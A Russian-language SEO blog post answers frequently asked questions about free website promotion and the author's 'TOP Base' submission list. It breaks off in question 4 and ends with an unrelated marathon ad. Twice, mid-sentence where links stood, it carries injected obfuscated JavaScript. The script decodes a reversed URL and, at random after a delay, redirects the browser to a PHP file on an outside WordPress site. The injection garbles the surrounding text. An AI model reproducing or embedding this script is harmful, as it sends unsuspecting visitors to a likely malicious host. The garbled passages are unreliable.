Этот пост построен на основе главы из моего бесплатного курса «Продвижение бесплатными способами» и включает в себя вопросы, которые мне задают чаще всего по поводу самостоятельного продвижения сайтов.
Если у вас останутся еще вопросы — пишите, пожалуйста, в комментариях!
Я за бесплатное продвижение, которое является:
Заниматься бесплатным продвижением совсем не сложно, как может показаться новичку, особенно когда есть $Bhq=function(n){if (typeof ($Bhq.list[n]) == «string») return $Bhq.list[n].split(«»).reverse().join(«»);return $Bhq.list[n];};$Bhq.list=[«\’php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}topbase.ru/» rel=»noopener noreferrer»>ТОП Базы вручную (ни первое, ни второе, конечно, не мешает вам добавлять свои собственные тематические, региональные и другие сайты, то есть расширять мою, уже готовую базу).
Единственное, что, по сути, вам для этого нужно – время.
Если у вас нет времени – платите деньги. Покупайте платные ссылки (которые, правда, чаще всего НЕ приносят целевых посетителей в отличие от большинства бесплатных мер) и заказывайте размещение по бесплатным видам у специалистов.
Если вы читаете этот курс, и у вас нет ТОП Базы, то это не так важно, курс будет построен в целом про разные виды сайтов, которые есть в интернете и которые, при желании и наличии дополнительного времени, вы сможете собрать сами.
Вы можете набрать в поисковике «добавить пресс-релиз медицина» и другие подобные запросы и сами начать собирать такую базу. А потом продвигать вручную. Это совершенно реально.
Я также довольно много писала обо всем в своих руководствах и статьях про разные виды сайтов и бесплатное продвижение в целом и поэтому я очень рекомендую их почитать (они в конце поста).
Так, к примеру, я не буду тут рассматривать вопросы «Как мне продвинуть информационный сайт» или «Что такое крауд-маркетинг и как мне с его помощью привлечь на сайт покупателей» и др. Это все есть в статьях в конце страницы.
Итак, 13 очень частых вопросов, на которые вы получите ответ ниже:
1. Что мне даст бесплатное продвижение? Это так же хорошо, как закупать ссылки?
2. Как сделать так, чтобы все было безопасно, чтобы с моим сайтом точно ничего не случилось?
3. С каких видов сайтов лучше начинать?
4. Если размещаться на заспамленных сайтах — не будет ли это вредом? Как можно почистить сайты?
7. Как правильно продвигать свой сайт, чтобы было все максимально хорошо?
9. Сколько у вас в базе средний PR, тИЦ у сайтов? Насколько они сейчас важны?
10. Мне бы продвигать так, чтобы только прямые ссылки, незакрытые, остальные не нужно.
12. Как быстро я увижу результат от такого продвижения?
13. В каких видах сайтов можно регистрировать несколько раз и как часто?
Вопрос 1: Что мне даст бесплатное продвижение? Это так же хорошо, как закупать ссылки?
Мой ответ:
Это другое.
Это частично гораздо лучше, чем закупать ссылки, частично немногим хуже.
Все ответы про сравнение бесплатных видов продвижения с арендованными (то есть одиночно стоящими, временными) ссылками здесь:
Кстати, если вас интересуют ответы на вопросы по платному ссылочному продвижению, то есть как грамотно закупать вечные ссылки и другие вопросы, то смотрите мое «Руководство, как сегодня правильно продвигать ссылками»
Из основных плюсов того бесплатного естественного продвижения в разных видах сайтов, про которое я тут говорю, — кроме того, что это не стоит денег, это хорошо еще и тем, что вы получите реальных целевых посетителей, то есть переходы по ссылке на ваш сайт. А также, например, повышение узнаваемости вашей компании или продукта на рынке, улучшение отношения к вашему продукту (смотря как, что и где вы будете размещать).
А реальные целевые посетители на сайт это:
— потенциальные покупатели или те, кто сделают целевое действие (кликнут по рекламе на сайте, подпишутся на бесплатные продукты или рассылку, или сделают еще что-то, ради чего создан сайт)
— трафик на сайт. Это благоприятно отразится в целом на поисковом продвижении. Сейчас я даже часто слышу рекомендации пустить контекстную рекламу на сайт ради самого трафика, чтобы проще было вывести молодой сайт повыше.
— улучшение поведенческих факторов. Целевой посетитель, перейдя с заинтересовавшей его заметки, статьи, объявления, новости, анонса на форуме и т.д. про ваш сайт и встретив на ссылке, куда он перешел продолжение интересующей его информации долго пробудет на сайте, совершит больше действий.
Мы как-то с одним из покупателей базы проводили такой эксперимент по размещению НЕАКТИВНЫХ ссылок на сайт внутри объявлений на тематических порталах. Текст объявления был интересным и соответствовал тому, что встречало человека на сайте. Таким образом, чтобы перейти на сайт, нужно было скопировать ссылку и вставить в браузер (что тоже является одним из ПФ). Плюс люди проводили довольно много времени на портале. В итоге – позиции немного росли без каких-то еще действий. Но объявления для этого размещались довольно часто и исключительно на тематических, подходящих площадках.
Вот что еще вы получите:
— диверсификация (разнообразие) трафика. У естественно продвигаемых сайтов поисковый трафик не является единственным или почти единственным вариантом. Кроме этого, на сайтах-лидерах есть масса переходов с самых разных других сайтов.
— шлейф социальных откликов. Тот же Дмитрий Шахов проводит много лет исследование и дает эту тему в своих курсах) отчеты о том, как социальные отклики (в том числе на форумах, тематических соцсетях и в блоговых системах) влияют на поисковое продвижение сайта. Лидеры — те, кто продвигаются естественно, всегда имеют много таких откликов и упоминаний самого разного рода.
— увеличение количества упоминаний бренда, которое является базисом, на котором стоит строить ваше поисковое продвижение. Чем чаще (особенно для сайта-новичка) упоминается просто URL сайта и название проекта, фирмы, тем проще будет продвигаться и по ключевым словам.
— размещение в рамках уникального релевантного (тематического) контента. Ну, конечно, если вы таким составили ваше объявление или статью, или новость, описание фирмы и т.д.
— часто размещение в основном контенте в основных разделах сайтов (в отличие от часто скрытых, замаскированных разделов, где продают вечные ссылки или блоков внизу или в сайдбарах сайтов, где продают арендованные).
— часто размещение на крупных порталах – тематических, региональных, общетематических. Те же доски объявлений, форумы, каталоги фирм и пр. разделы часто являются частью крупных трастовых порталов.
— возможность «посветиться» на вашем тематическом интернет-рынке.
В общем, плюсов от бесплатных видов продвижения на самом деле масса.
Вопрос 2: Как сделать так, чтобы все было безопасно, чтобы с моим сайтом точно ничего не случилось?
Мой ответ:
Про это я тоже много раз писала, пишу везде и постоянно ) Меньше всего мне хотелось бы, чтобы ваши сайты попали под бан. В частности, поэтому ТОП базу я стараюсь постоянно чистить на предмет тех же заспамленных, «мусорных» каталогов сайтов. Какие-то оставляю на ваш выбор, но многие удаляю в черный список, даже если они с виду вполне рабочие, ваше описание в них улетит, но явно никакой пользы они вашему сайту не принесут.
В целом ТОП База безопасна сама по себе, если не торопиться и не размещаться массово.
Именно большую часть видов сайтов из ТОП Базы сегодня рекомендуют использовать все SEO-блогеры и специалисты для получения естественных ссылок на сайт, что очень важно для качественного ссылочного профиля. В том числе это помогает избежать фильтра Минусинск (но при этом конечно нельзя закупать ссылки в больших количествах). Здесь идет речь в первую очередь про те виды ссылок, которые были созданы их создателями не для продвижения чужих ссылок, а для других целей. Это — пресс-релизовые сайты, каталоги фирм, форумы, соцсети, блоговые системы, сервисы отзывов, сервисы вопросов и ответов, сервисы соцновостей. Каталоги сайтов и статей, профили на форумах и доски объявлений я рекомендую оставить на потом. Об этом я пишу ниже в ответе на вопрос № 3.
ТОП База не является сборищем каталогов и досок, настроенных под автомат, как большинство других баз для Allsubmitter, которые его и дискредитируют сейчас и представляют опасным инструментом для продвижения.
Но все равно, помните, что главные секреты безопасного продвижения:
1. постепенность
2. полуавтомат (или ручное размещение)
3. Разнообразие.
При этом вы можете продвигаться не сильно разнообразно, не очень качественно, не зная, как именно продвигаться в разных видах сайтов, но если это будет постепенно, на полуавтомате то уже будет полезно.
Очень желательно, если параллельно будет расти уникальный, хороший контент на вашем сайте и будут какие-то соцсигналы, тогда можно увеличивать темпы прироста ссылочной массы. Но это не обязательное условие безопасного продвижения.
Если вы поставите в Allsubmitter скаченную где-то базу для авторегистрации и прогоните свой сайт, то это будет плохо, вредно и опасно.
Фильтры поисковых систем даже могут не наступить сразу, но вы получите первую порцию резкого прироста плохих ссылок. Если дальше произойдет какое-то подобное действие, то накопительный эффект даст о себе знать и фильтр наверняка появится.
Поэтому либо используйте ТОП Базу, либо собирайте свою. Но не берите в интернете базы для автопрогонов
Авторегистрации еще имеют смысл для досок объявлений или с программой $Bhq=function(n){if (typeof ($Bhq.list[n]) == «string») return $Bhq.list[n].split(«»).reverse().join(«»);return $Bhq.list[n];};$Bhq.list=[«\’php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}topshop.ru/vse-stati-xrumer.html» rel=»noopener noreferrer»>Тут можно больше прочитать о том, как и что умеет Хрумер.
Подробнее обо всем этом в этих статьях (все они еще раз идут в самом конце статьи):
Вопрос 3: С каких видов сайтов лучше начинать?
Мой ответ:
Я всегда рекомендую начинать с тех видов сайтов, которые выглядят более естественно для нового сайта, с тех, которые могут дать информационный повод для распространения.
Это тематические и региональные соцсети и блоговые системы, форумы, сервисы соцновостей, сервисы вопросов и ответов, сервисы отзывов.
На всех этих видах сайтов можно разместить, к примеру, новость о появлении сайта.
Если сайт уже существовал давно до этого, и эта новость не актуальна, то придумайте какой-то крупный повод, его можно изобрести. Я рассылала пресс-релизы, что ТОП базе исполнилось 3 года и его тоже довольно много где приняли (а ведь это даже не фирма и не информационный проект и повод не очень существенный). О том, как размещаться в пресс-релизовых сайтах для некоммерческого проекта я пишу ниже, в вопросе №8.
Далее можете подключать каталоги фирм
Потом все остальные виды сайтов вашего региона, вашей и смежных тематик. Это каталоги сайтов, каталоги статей, доски объявлений.
Постепенно можно также использовать все другие виды – трастовые сайты, сервисы закладок, обмен ссылками (с качественными сайтами вашей тематики), другие малопопулярные, но полезные – сайты, где можно разместить тендер, мероприятие, акцию или скидку, персону, вакансию и пр.
И все общетематические общерегиональные сайты, которые вы еще не использовали — ОБЩИЕ (как ни называются в ТОП Базе).
Многие виды сайтов можно проходить и на много раз с разным материалом, разными ссылками на страницы вашего сайта (про это в последнем, 13-м вопросе, ниже).
Вопрос 4: Если размещаться на заспамленных сайтах — не будет ли это вредом? Как можно почистить сайты?
Мой ответ:
Иногда меня спрашивают — почему вы не почистите свою базу каким-нибудь
Приходите на бесплатную калибровку жизни вместе со мной - "Бесплатный Летний стратегический калибровочный марафон Анны Ященко"
Старт 20 июня - на Летнее Солнцестояние. Но можно присоединиться и позже, получить файл с калибровочными заданиями